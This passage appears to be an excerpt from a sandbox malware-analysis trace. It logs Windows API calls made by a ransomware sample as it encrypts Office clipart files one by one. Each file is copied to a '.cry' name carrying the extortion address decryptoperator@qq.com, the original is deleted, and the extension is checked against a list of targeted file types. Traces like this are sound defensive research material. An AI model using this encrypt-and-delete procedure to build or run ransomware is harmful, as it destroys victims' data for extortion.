files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 0x20 [0051.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.629] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.629] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.630] GetLastError () returned 0x0 [0051.630] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xbd2, lpOverlapped=0x0) returned 1 [0051.645] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xbe0, lpOverlapped=0x0) returned 1 [0051.646] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.646] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.646] SetEndOfFile (hFile=0x22c) returned 1 [0051.646] CloseHandle (hObject=0x22c) returned 1 [0051.646] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.646] SetEndOfFile (hFile=0x194) returned 1 [0051.647] CloseHandle (hObject=0x194) returned 1 [0051.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0051.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.647] lstrlenW (lpString=".doc") returned 4 [0051.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.647] lstrlenW (lpString=".docx") returned 5 [0051.647] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.648] lstrlenW (lpString=".pdf") returned 4 [0051.648] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.648] lstrlenW (lpString=".xls") returned 4 [0051.648] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.648] lstrlenW (lpString=".xlsx") returned 5 [0051.649] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.649] lstrlenW (lpString=".ppt") returned 4 [0051.649] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.649] lstrlenW (lpString=".zip") returned 4 [0051.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.649] lstrlenW (lpString=".rar") returned 4 [0051.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.649] lstrlenW (lpString=".bz2") returned 4 [0051.649] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.649] lstrlenW (lpString=".7z") returned 3 [0051.649] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.649] lstrlenW (lpString=".dbf") returned 4 [0051.649] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.649] lstrlenW (lpString=".1cd") returned 4 [0051.649] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.649] lstrlenW (lpString=".jpg") returned 4 [0051.649] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.649] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=4734) returned 1 [0051.649] CloseHandle (hObject=0x194) returned 1 [0051.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 0x20 [0051.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.650] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.650] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.650] GetLastError () returned 0x0 [0051.650] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x127e, lpOverlapped=0x0) returned 1 [0051.691] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1280, lpOverlapped=0x0) returned 1 [0051.692] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.692] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.692] SetEndOfFile (hFile=0x22c) returned 1 [0051.692] CloseHandle (hObject=0x22c) returned 1 [0051.692] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.692] SetEndOfFile (hFile=0x194) returned 1 [0051.693] CloseHandle (hObject=0x194) returned 1 [0051.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString=".doc") returned 4 [0051.694] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString=".docx") returned 5 [0051.694] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.694] lstrlenW (lpString=".pdf") returned 4 [0051.694] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString=".xls") returned 4 [0051.694] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.694] lstrlenW (lpString=".xlsx") returned 5 [0051.694] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.694] lstrlenW (lpString=".ppt") returned 4 [0051.694] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString=".zip") returned 4 [0051.694] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.694] lstrlenW (lpString=".rar") returned 4 [0051.694] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString=".bz2") returned 4 [0051.694] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString=".7z") returned 3 [0051.694] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString=".dbf") returned 4 [0051.694] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString=".1cd") returned 4 [0051.694] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0051.694] lstrlenW (lpString=".jpg") returned 4 [0051.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.695] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=20578) returned 1 [0051.695] CloseHandle (hObject=0x194) returned 1 [0051.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 0x20 [0051.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.695] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.695] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.696] GetLastError () returned 0x0 [0051.696] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x5062, lpOverlapped=0x0) returned 1 [0051.760] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0051.761] ReadFile (in: hFile=0x194, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.761] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.761] SetEndOfFile (hFile=0x22c) returned 1 [0052.071] CloseHandle (hObject=0x22c) returned 1 [0052.072] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.072] SetEndOfFile (hFile=0x194) returned 1 [0052.072] CloseHandle (hObject=0x194) returned 1 [0052.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.073] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0052.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.140] lstrlenW (lpString=".doc") returned 4 [0052.140] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.140] lstrlenW (lpString=".docx") returned 5 [0052.140] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.140] lstrlenW (lpString=".pdf") returned 4 [0052.140] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.140] lstrlenW (lpString=".xls") returned 4 [0052.140] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.140] lstrlenW (lpString=".xlsx") returned 5 [0052.140] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.141] lstrlenW (lpString=".ppt") returned 4 [0052.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.141] lstrlenW (lpString=".zip") returned 4 [0052.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.141] lstrlenW (lpString=".rar") returned 4 [0052.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.141] lstrlenW (lpString=".bz2") returned 4 [0052.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.141] lstrlenW (lpString=".7z") returned 3 [0052.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.141] lstrlenW (lpString=".dbf") returned 4 [0052.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.141] lstrlenW (lpString=".1cd") returned 4 [0052.141] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0052.141] lstrlenW (lpString=".jpg") returned 4 [0052.141] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.228] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.228] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.228] GetLastError () returned 0x0 [0052.228] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xd10, lpOverlapped=0x0) returned 1 [0052.394] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0052.395] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.395] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.395] SetEndOfFile (hFile=0x190) returned 1 [0052.475] CloseHandle (hObject=0x190) returned 1 [0052.475] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.475] SetEndOfFile (hFile=0x1ac) returned 1 [0052.476] CloseHandle (hObject=0x1ac) returned 1 [0052.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString=".doc") returned 4 [0052.477] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString=".docx") returned 5 [0052.477] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.477] lstrlenW (lpString=".pdf") returned 4 [0052.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString=".xls") returned 4 [0052.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.477] lstrlenW (lpString=".xlsx") returned 5 [0052.477] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.477] lstrlenW (lpString=".ppt") returned 4 [0052.477] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString=".zip") returned 4 [0052.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.477] lstrlenW (lpString=".rar") returned 4 [0052.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString=".bz2") returned 4 [0052.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString=".7z") returned 3 [0052.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString=".dbf") returned 4 [0052.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString=".1cd") returned 4 [0052.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0052.477] lstrlenW (lpString=".jpg") returned 4 [0052.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.478] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1832) returned 1 [0052.478] CloseHandle (hObject=0x1ac) returned 1 [0052.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 0x20 [0052.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0052.478] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.478] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.479] GetLastError () returned 0x0 [0052.479] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x728, lpOverlapped=0x0) returned 1 [0052.485] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x730, lpOverlapped=0x0) returned 1 [0052.486] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.486] WriteFile (in: hFile=0x190, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.486] SetEndOfFile (hFile=0x190) returned 1 [0052.487] CloseHandle (hObject=0x190) returned 1 [0052.487] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.487] SetEndOfFile (hFile=0x1ac) returned 1 [0052.487] CloseHandle (hObject=0x1ac) returned 1 [0052.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0052.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0052.489] lstrlenW (lpString=".doc") returned 4 [0052.489] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString=".docx") returned 5 [0052.489] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.489] lstrlenW (lpString=".pdf") returned 4 [0052.489] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.489] lstrlenW (lpString=".xls") returned 4 [0052.489] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.489] lstrlenW (lpString=".xlsx") returned 5 [0052.489] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.489] lstrlenW (lpString=".ppt") returned 4 [0052.489] lstrcmpiW 